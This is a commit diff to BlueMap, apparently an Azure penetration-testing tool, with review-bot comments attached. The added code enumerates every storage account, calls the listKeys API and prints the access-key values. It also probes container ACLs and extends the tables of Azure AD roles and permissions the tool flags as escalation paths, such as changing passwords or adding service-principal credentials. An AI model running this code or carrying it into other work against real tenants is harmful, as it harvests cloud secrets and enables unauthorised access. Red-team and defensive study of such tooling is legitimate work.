Projects STRLCPY BlueMap Commits eb5eb1d2
  • ■ ■ ■ ■ ■
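--- a/bluemap.py
+++ b/bluemap.py
@@ -16,6 +16,7 @@
 Token = None
 accessTokenGraph = None
 accessTokenVault = None
+storageAccessToken = None
 TotalTargets = []
 TargetSubscription = None
 TargetTenantId = None
@@ -188,9 +189,12 @@
  hasGraphAccess = False
  hasVaultEnabled = False
  Token = token
- listSubs = ListSubscriptionsForToken()
- TargetSubscription = listSubs['value'][0]['subscriptionId']
- TargetTenantId = parseTenantId()
+ try:
+ listSubs = ListSubscriptionsForToken()
+ TargetSubscription = listSubs['value'][0]['subscriptionId']
+ TargetTenantId = parseTenantId()
+ except KeyError:
+ pass
 
 
 def originitToken(token):
@@ -252,6 +256,11 @@
  result.append(item)
  return result
 
+def ContainerACL(storageAccount):
+ global storageAccessToken
+ r = sendGETRequest("https://"+storageAccount+".blob.core.windows.net/dev?restype=container&comp=acl", accessTokenGraph)
+ return r["status_code"]
+
 def RD_ListAllUsers():
  global accessTokenGraph
  r = sendGETRequest("https://graph.microsoft.com/v1.0/users/", accessTokenGraph)
@@ -443,6 +452,11 @@
  item['resourceGroup'] = res['name']
  result.append(item)
  return result
+def RD_ListAllStorageAccountsKeys(AccId):
+ global Token
+ r = sendPOSTRequest("https://management.azure.com/"+AccId+"/listKeys?api-version=2022-05-01", None, Token)
+ return r['json']
+
 def RD_ListAllStorageAccounts():
  global Token
  result = []
@@ -451,6 +465,7 @@
  for res in getResGroup(sub['subscriptionId'])['value']:
  rsVM = sendGETRequest("https://management.azure.com/subscriptions/"+sub['subscriptionId']+"/resourceGroups/"+res['name']+"/providers/Microsoft.Storage/storageAccounts?api-version=2021-09-01", Token)
  for item in rsVM['json']['value']:
+
  item['subscriptionId'] = sub['subscriptionId']
  item['resourceGroup'] = res['name']
 
@@ -694,8 +709,8 @@
  vaultAbuseCertAndKeysOnlyRoles = ["Key Vault Certificates Officer", "Key Vault Crypto Officer"]
  shadowRisks = ["Cloud Application Administrator", "Application Administrator", "Password Administrator",
  "Privileged Authentication Administrator", "Authentication Administrator",
- "Privileged Role Administrator", "User Account Administrator", "User Administartor",
- "Helpdesk Administartor"]
+ "Privileged Role Administrator", "User Account Administrator", "User Administrator", "User Access Administrator",
+ "Helpdesk Administrator", "Directory Synchronization Accounts", "Hybrid Identity Administrator"]
  classicAdministartors = ["Account Administrator", "Service Administrator", "Co-Administrator"]
  if currentRoleName in vaultAbuseRoles:
  return currentRoleName + "|" + "allows to retrieve secrets from key vault."
@@ -709,6 +724,8 @@
  return currentRoleName + "|" + "Can read everything in Azure AD, without the ability to update."
  elif currentRoleName == "Global Administrator" or currentRoleName == "Company Administrator":
  return currentRoleName + "|" + "has a god mode, which can manage all aspects of Azure AD. (think like Domain Admin)"
+ elif currentRoleName == "User Administrator" or currentRoleName == "Groups Administrators" or currentRoleName == "Directory Writers":
+ return currentRoleName + "|" + "has permissions to modify group membership in Azure AD."
  elif currentRoleName == "Virtual Machine Contributor":
  return currentRoleName + "|" + "allows manage of VMs including disks, snapshots, extensions, and password restoration."
  elif currentRoleName == "Automation Operator" or currentRoleName == "Automation Contributor":
@@ -718,7 +735,7 @@
  elif currentRoleName == "User Access Administrator":
  return currentRoleName + "|" + "has manage access to all resources within the subscription."
  elif currentRoleName in shadowRisks:
- return currentRoleName + "|" + " has full directory admin rights, easy way to esclate."
+ return currentRoleName + "|" + " has full directory admin rights, easy way to esclate (i.e. use change password)."
  elif currentRoleName in classicAdministartors:
  return currentRoleName + "|" + "Is found as one of the three classic subscription administrative roles. Please notice: Service Administrator and Account Administrator are equivalent to the Owner role in the subscription."
  elif currentRoleName == "Owner":
@@ -743,6 +760,10 @@
  "Microsoft.Storage/listServiceSas/action"]
  ARMTemplateAbuse = ["Microsoft.Resources/deployments/*"]
  DirectoryAbuse = ["Microsoft.Resources/deployments/*"]
+ AllowGroupModify = ["microsoft.directory/groups/members/update"]
+ AllowUserCreation = ["microsoft.directory/users/create"]
+ allowsSPCreation = ["microsoft.directory/servicePrincipals/create"]
+ allowsSPUpdate = ["microsoft.directory/servicePrincipals/credentials/update"]
  ExtensionsAbuse = ["Microsoft.ClassicCompute/virtualMachines/extensions/*",
  "Microsoft.Compute/virtualMachines/extensions/read",
  "Microsoft.Compute/virtualMachines/extensions/write"]
@@ -759,8 +780,16 @@
  return "" + "|" + "That's means to have a Contributor/Owner permission on resources."
  elif currentPermission in vmPermissions:
  return currentPermission + "|" + "allows execute code on Virtual Machines."
+ elif currentPermission in allowsSPCreation:
+ return currentPermission + "|" + "allows creation of new application registration (service principle)."
+ elif currentPermission in allowsSPUpdate:
+ return currentPermission + "|" + "allows add service principle for an existing application registration."
+ elif currentPermission in AllowGroupModify:
+ return currentPermission + "|" + "allows modify group membership in Azure AD."
+ elif currentPermission in AllowUserCreation:
+ return currentPermission + "|" + "allows new user creation in Azure AD."
  elif currentPermission in vmAllowDeployPermission:
- return currentPermission + "|" + "allows VM deployment or configuraiton of existing VM."
+ return currentPermission + "|" + "allows VM deployment or configuration of existing VM."
  elif currentPermission in StorangeAccountAbuse:
  return currentPermission + "|" + "can abuse storage accounts (i.e., view blobs)."
  elif currentPermission in ARMTemplateAbuse:
@@ -1009,7 +1038,6 @@
  print(banner)
  '''
  supportedCommands = [
- "test",
  "whoami",
  "scopes",
  "get_subs",
@@ -1045,8 +1073,9 @@
  "Reader/ListAppServiceSites",
  "Reader/ListVirtualMachines",
  "Reader/ListAllStorageAccounts",
+ "Reader/ListStorageAccountsKeys",
  "Reader/ARMTemplatesDisclosure",
- "Reader/ListServicePrincipal",
+ "Reader/ListServicePrincipals",
  "Reader/abuseServicePrincipals",
  "Contributor/ListACRCredentials",
  "Contributor/ReadVaultSecret",
@@ -1076,9 +1105,6 @@
  print("Use run command only within an exploit.")
  elif mode == "whoami":
  currentProfile()
- elif mode == "test":
- x = sendGETRequest("https://management.azure.com/subscriptions/?api-version=2017-05-10", Token)
- print(dict(x['headers'])['Content-Type'])
  elif mode == "scopes":
  currentScope()
  elif mode == "get_subs" or mode == "subs":
@@ -1544,6 +1570,30 @@
  )
  AllStorageAccountRecordsCount += 1
  print(make_table(field_names, rows))
+ elif "Reader/ListStorageAccountsKeys" in ExploitChoosen and mode == "run":
+ print("Trying to list all storage accounts keys.. (it might take a few minutes)")
+ if len(RD_ListAllStorageAccounts()) < 1:
+ print("No Storage Accounts were found.")
+ else:
+ field_names = ["#", "Name", "Location", "Type", "Key", "Value", "Permissions", "Resource Group"]
+ rows = []
+ AllStorageAccountRecordsCount = 0
+ for SARecord in RD_ListAllStorageAccounts():
+ Data = RD_ListAllStorageAccountsKeys(SARecord['id'])
+ for key in Data['keys']:
+ rows.append(
+ {"#": AllStorageAccountRecordsCount,
+ "Name": SARecord['name'],
+ "Location": SARecord['location'],
+ "Type": SARecord['type'],
+ "Key": key['keyName'],
+ "Value": key['value'],
+ "Permissions": key['permissions'],
+ "Resource Group": SARecord['resourceGroup']
+ }
+ )
+ AllStorageAccountRecordsCount += 1
+ print(make_table(field_names, rows))
  elif "Reader/ListAllVaults" in ExploitChoosen and mode == "run":
  print("Trying to list all vaults.. (it might take a few minutes)")
  if len(RD_ListAllVaults()) < 1:
@@ -1599,7 +1649,7 @@
  )
  AllVMRecordsCount += 1
  print(make_table(field_names, rows))
- elif "Reader/ListServicePrincipal" in ExploitChoosen and mode == "run":
+ elif "Reader/ListServicePrincipals" in ExploitChoosen and mode == "run":
  print("Trying to enumerate all service principles (App registrations)..")
  if len(RD_AddAppSecret()) < 1:
  print("No Apps registrations were found.")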
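Review bot: `ContainerACL` declares `global storageAccessToken` but then passes `accessTokenGraph` to `sendGETRequest`, so a bearer token issued for Microsoft Graph is sent to a blob endpoint whose hostname is built from the caller-supplied `storageAccount`. In the visible hunks `storageAccessToken` is only initialised to `None` and never assigned, so the storage-audience token looks missing rather than merely mis-wired; the rest of the file is not shown, so this should be confirmed. I would pass the storage token as the second argument (`storageAccessToken` instead of `accessTokenGraph`) and reject any `storageAccount` that is not 3-24 lowercase letters and digits before concatenating it into the host, so a token can never be sent outside `*.blob.core.windows.net`. The container name `dev` is also hard-coded in the URL and probably wants to be a parameter.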
  • ■ ■ ■ ■ ■ ■
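--- a/requirements.txt
+++ b/requirements.txt
@@ -0,0 +1,3 @@
+requests~=2.28.1
+prettytable~=3.4.1
+pyreadline3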
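Review bot: `pyreadline3` is the only entry without a version specifier, so every install resolves whatever release is current, while `requests` and `prettytable` are held to a compatible-release range. For a tool that handles bearer tokens I would constrain it like the others, and since pyreadline3 is a Windows readline replacement, add an environment marker: `pyreadline3~=<PINNED_VERSION>; sys_platform == "win32"`. Installing with `pip install --require-hashes` against a hash-pinned file would tighten this further.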